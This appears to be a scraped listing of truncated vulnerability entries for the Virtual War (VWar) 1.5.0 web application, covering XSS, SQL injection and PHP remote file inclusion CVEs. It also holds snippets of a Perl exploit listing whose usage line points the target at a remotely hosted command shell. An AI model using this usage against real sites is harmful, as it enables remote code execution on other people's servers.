CVE-2006-4224

CVE-2006-4224 is an XSS vulnerability in Virtual War (VWar) calendar.php affecting VWar 1.5.0 and earlier. The vulnerability allows remote attackers to inject arbitrary web script or HTML via the year parameter. The CVE also notes that the page parameter vector is covered by CVE-2006-4009. No fur...

CVE-2006-4142

SQL injection vulnerability in extra/online.php in Virtual War VWar 1.5.0 R14 and earlier allows remote attackers to execute arbitrary SQL commands via the n parameter...

CVE-2006-4141

SQL injection vulnerability in news.php in Virtual War VWar 1.5.0 and earlier allows remote attackers to execute arbitrary SQL commands via the 1 sortby and 2 sortorder parameters...

CVE-2006-1747

CVE-2006-1747 affects Virtual War (VWar) 1.5.0 and earlier. It is a PHP remote file inclusion vulnerability allowing an attacker to execute arbitrary PHP code by supplying a URL in the vwar_root parameter to admin/admin.php, war.php, stats.php, news.php, joinus.php, challenge.php, calendar.php, m...

CVE-2006-1747

PHP remote file inclusion vulnerability in Virtual War VWar 1.5.0 allows remote attackers to execute arbitrary PHP code via a URL in the vwarroot parameter to 1 admin/admin.php, 2 war.php, 3 stats.php, 4 news.php, 5 joinus.php, 6 challenge.php, 7 calendar.php, 8 member.php, 9 popup.php, and other...

Remote file inclusion

PHP remote file inclusion vulnerability in getheader.php in VWar 1.5.0 R12 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the vwarroot parameter. NOTE: this is a different vulnerability than CVE-2006-1503...

CVE-2006-1636

PHP remote file inclusion vulnerability in getheader.php in VWar 1.5.0 R12 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the vwarroot parameter. NOTE: this is a different vulnerability than CVE-2006-1503...

VWar 1.5.0 R12 Remote File Inclusion Exploit

No description provided by source. !/usr/bin/perl VWar = 1.5.0 R12 Remote File Inclusion Exploit Bug Found By uid0 code by zod c 2006 ExploiterCode.com usage: perl vwar.pl location of VWar cmd shell location cmd shell variable perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd cmd she...

VWar 1.5.0 R12 - Remote File Inclusion

VWar 1.5.0 R12 - Remote File Inclusion !/usr/bin/perl VWar perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else! special shout to illwill!...

vwar.pl.txt

!/usr/bin/perl VWar perl vwar.pl http://site.com/vwar/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, and everyone else! special shout to illwill! Contact: www.exploitercode.com irc.exploitercode.com...